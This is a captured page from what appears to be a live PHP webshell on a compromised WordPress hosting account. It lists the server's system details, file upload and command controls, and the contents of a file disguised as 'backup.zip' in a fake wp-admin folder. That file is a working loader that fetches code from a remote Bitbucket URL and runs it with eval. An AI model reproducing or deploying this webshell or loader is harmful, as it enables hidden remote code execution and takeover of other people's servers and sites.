- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 162.0.215.126  /  Your IP : 216.73.216.4
Web Server : LiteSpeed
System : Linux business105.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
User : tektomgb ( 586)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tektomgb/public_html/wp-admin-myej0/xx/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tektomgb/public_html/wp-admin-myej0/xx/backup.zip
<?php

ob_start();

$remoteUrl = "https://bitbucket.org/uidrootpython/rmt/raw/ea63604e02b84b836c32b68865233ae1e02d1b94/xlmain.txt";
$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$remoteCode = curl_exec($ch);
if (curl_errno($ch)) {
    ob_end_clean();
    die('cURL error: ' . curl_error($ch));
}
curl_close($ch);

if ($remoteCode === false || trim($remoteCode) === '') {
    ob_end_clean();
    die('Failed to load remote code.');
}


try {
    eval("?>$remoteCode");
} catch (Throwable $e) {
    ob_end_clean();
    die('Error in remote code execution: ' . $e->getMessage());
}

ob_end_flush();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit